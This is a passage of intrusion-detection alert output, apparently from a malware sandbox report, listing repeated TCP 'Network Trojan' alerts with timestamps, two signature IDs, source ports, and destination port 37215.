                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292168
                SID:2835222
                Source Port:44110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559695
                SID:2829579
                Source Port:32996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928251
                SID:2835222
                Source Port:56704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178869
                SID:2835222
                Source Port:41166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653812
                SID:2829579
                Source Port:36314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026558
                SID:2835222
                Source Port:52274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.116475
                SID:2829579
                Source Port:59236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711926
                SID:2835222
                Source Port:49662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557962
                SID:2829579
                Source Port:46052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155602
                SID:2835222
                Source Port:42624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597917
                SID:2835222
                Source Port:36616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902904
                SID:2835222
                Source Port:34532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740168
                SID:2835222
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390320
                SID:2835222
                Source Port:55680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024932
                SID:2835222
                Source Port:37602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947277
                SID:2835222
                Source Port:49414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422046
                SID:2829579
                Source Port:52224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363528
                SID:2829579
                Source Port:38356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432733
                SID:2829579
                Source Port:57912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653990
                SID:2835222
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765666
                SID:2835222
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415792
                SID:2829579
                Source Port:59642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716226
                SID:2835222
                Source Port:60162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100072
                SID:2829579
                Source Port:45008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586380
                SID:2829579
                Source Port:37202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862739
                SID:2835222
                Source Port:60260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586396
                SID:2835222
                Source Port:33770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068043
                SID:2829579
                Source Port:48122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945766
                SID:2829579
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418621
                SID:2829579
                Source Port:52768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848961
                SID:2829579
                Source Port:52442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231300
                SID:2829579
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.025359
                SID:2835222
                Source Port:52032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.927581
                SID:2829579
                Source Port:51508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665816
                SID:2835222
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265235
                SID:2829579
                Source Port:39424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728996
                SID:2835222
                Source Port:45048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826193
                SID:2829579
                Source Port:36574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844538
                SID:2835222
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666363
                SID:2835222
                Source Port:45590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674930
                SID:2835222
                Source Port:43442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893259
                SID:2829579
                Source Port:42084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824518
                SID:2835222
                Source Port:44162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965773
                SID:2835222
                Source Port:43856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042801
                SID:2829579
                Source Port:49528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505422
                SID:2835222
                Source Port:44096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223742
                SID:2835222
                Source Port:46690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913679
                SID:2835222
                Source Port:58372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970447
                SID:2829579
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854501
                SID:2835222
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508771
                SID:2829579
                Source Port:52744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617555
                SID:2829579
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434446
                SID:2835222
                Source Port:35340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535423
                SID:2829579
                Source Port:55506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881801
                SID:2829579
                Source Port:40100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982117
                SID:2829579
                Source Port:35530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586731
                SID:2835222
                Source Port:48276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832607
                SID:2829579
                Source Port:38892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144457
                SID:2829579
                Source Port:55202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702598
                SID:2835222
                Source Port:37298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075371
                SID:2835222
                Source Port:35480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946739
                SID:2829579
                Source Port:47902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706540
                SID:2835222
                Source Port:45498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369798
                SID:2829579
                Source Port:36846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427019
                SID:2829579
                Source Port:58134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512364
                SID:2835222
                Source Port:40460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532347
                SID:2829579
                Source Port:44008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660337
                SID:2829579
                Source Port:38732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420336
                SID:2835222
                Source Port:34902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613168
                SID:2835222
                Source Port:53776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.114229
                SID:2835222
                Source Port:58826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796697
                SID:2835222
                Source Port:47850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264331
                SID:2829579
                Source Port:57128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084761
                SID:2829579
                Source Port:48884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931084
                SID:2829579
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567278
                SID:2835222
                Source Port:58130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831264
                SID:2829579
                Source Port:60808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075139
                SID:2835222
                Source Port:45958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208112
                SID:2829579
                Source Port:51208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231221
                SID:2829579
                Source Port:53096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070216
                SID:2829579
                Source Port:57264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837777
                SID:2829579
                Source Port:46536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887590
                SID:2829579
                Source Port:58490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576135
                SID:2835222
                Source Port:59718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916027
                SID:2829579
                Source Port:46642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075601
                SID:2835222
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227106
                SID:2835222
                Source Port:48374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019990
                SID:2829579
                Source Port:49998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155534
                SID:2835222
                Source Port:36104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010544
                SID:2835222
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165026
                SID:2835222
                Source Port:44920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230955
                SID:2835222
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415076
                SID:2829579
                Source Port:35014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222755
                SID:2835222
                Source Port:57820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800323
                SID:2829579
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967223
                SID:2835222
                Source Port:36240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133260
                SID:2835222
                Source Port:36320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990517
                SID:2835222
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528564
                SID:2835222
                Source Port:46776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176680
                SID:2835222
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900191
                SID:2829579
                Source Port:54318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262395
                SID:2835222
                Source Port:39958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763732
                SID:2829579
                Source Port:38412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435868
                SID:2835222
                Source Port:54192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165263
                SID:2835222
                Source Port:46224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335379
                SID:2835222
                Source Port:33520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812939
                SID:2835222
                Source Port:46380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135429
                SID:2835222
                Source Port:47496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685961
                SID:2835222
                Source Port:37782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380865
                SID:2829579
                Source Port:35732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446651
                SID:2835222
                Source Port:43298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615167
                SID:2835222
                Source Port:50272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280543
                SID:2835222
                Source Port:38918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815991
                SID:2829579
                Source Port:60410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947703
                SID:2835222
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181793
                SID:2835222
                Source Port:38302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664587
                SID:2835222
                Source Port:45904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940065
                SID:2829579
                Source Port:57230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663589
                SID:2829579
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728803
                SID:2829579
                Source Port:53266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332318
                SID:2835222
                Source Port:45078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834453
                SID:2835222
                Source Port:56378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179808
                SID:2829579
                Source Port:55290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926816
                SID:2835222
                Source Port:44474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985443
                SID:2829579
                Source Port:36224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421770
                SID:2829579
                Source Port:36478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655662
                SID:2829579
                Source Port:43922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675147
                SID:2835222
                Source Port:36016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041981
                SID:2835222
                Source Port:36452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583970
                SID:2829579
                Source Port:48556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586063
                SID:2829579
                Source Port:41256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265650
                SID:2829579
                Source Port:47950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845675
                SID:2829579
                Source Port:40996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462964
                SID:2835222
                Source Port:54714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337116
                SID:2829579
                Source Port:49014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969925
                SID:2829579
                Source Port:33876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264741
                SID:2829579
                Source Port:33892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667959
                SID:2829579
                Source Port:43172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173349
                SID:2835222
                Source Port:39150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222842
                SID:2835222
                Source Port:41030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.469654
                SID:2829579
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.715868
                SID:2829579
                Source Port:50776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072370
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523988
                SID:2829579
                Source Port:49846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271423
                SID:2835222
                Source Port:59816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786899
                SID:2835222
                Source Port:35252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618692
                SID:2829579
                Source Port:39312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911092
                SID:2829579
                Source Port:37944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686248
                SID:2829579
                Source Port:38492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858926
                SID:2829579
                Source Port:34762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559510
                SID:2835222
                Source Port:60064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398673
                SID:2835222
                Source Port:54220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900366
                SID:2835222
                Source Port:53254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263534
                SID:2835222
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371416
                SID:2829579
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464651
                SID:2829579
                Source Port:45108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509898
                SID:2829579
                Source Port:56284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712885
                SID:2835222
                Source Port:47960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076539
                SID:2829579
                Source Port:41570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535874
                SID:2829579
                Source Port:33984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712977
                SID:2835222
                Source Port:48122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032977
                SID:2829579
                Source Port:59146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443152
                SID:2829579
                Source Port:41444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028109
                SID:2835222
                Source Port:57740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141068
                SID:2829579
                Source Port:44936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285657
                SID:2829579
                Source Port:40112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223455
                SID:2835222
                Source Port:42682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914904
                SID:2835222
                Source Port:43708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805970
                SID:2829579
                Source Port:49122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867758
                SID:2835222
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765611
                SID:2835222
                Source Port:56476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468609
                SID:2835222
                Source Port:36522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780806
                SID:2835222
                Source Port:60802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332271
                SID:2835222
                Source Port:40844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659061
                SID:2829579
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036762
                SID:2835222
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900352
                SID:2835222
                Source Port:34366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162165
                SID:2829579
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628583
                SID:2829579
                Source Port:57964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560773
                SID:2835222
                Source Port:41190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720180
                SID:2835222
                Source Port:39866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909847
                SID:2835222
                Source Port:54128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537659
                SID:2835222
                Source Port:55352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786674
                SID:2835222
                Source Port:37404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948357
                SID:2829579
                Source Port:54214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505060
                SID:2829579
                Source Port:45864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262666
                SID:2829579
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023370
                SID:2829579
                Source Port:42628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891217
                SID:2835222
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532404
                SID:2835222
                Source Port:33116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787678
                SID:2829579
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784923
                SID:2829579
                Source Port:35986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790874
                SID:2835222
                Source Port:41884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386355
                SID:2835222
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221868
                SID:2835222
                Source Port:40842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506975
                SID:2835222
                Source Port:42058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223081
                SID:2835222
                Source Port:43344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
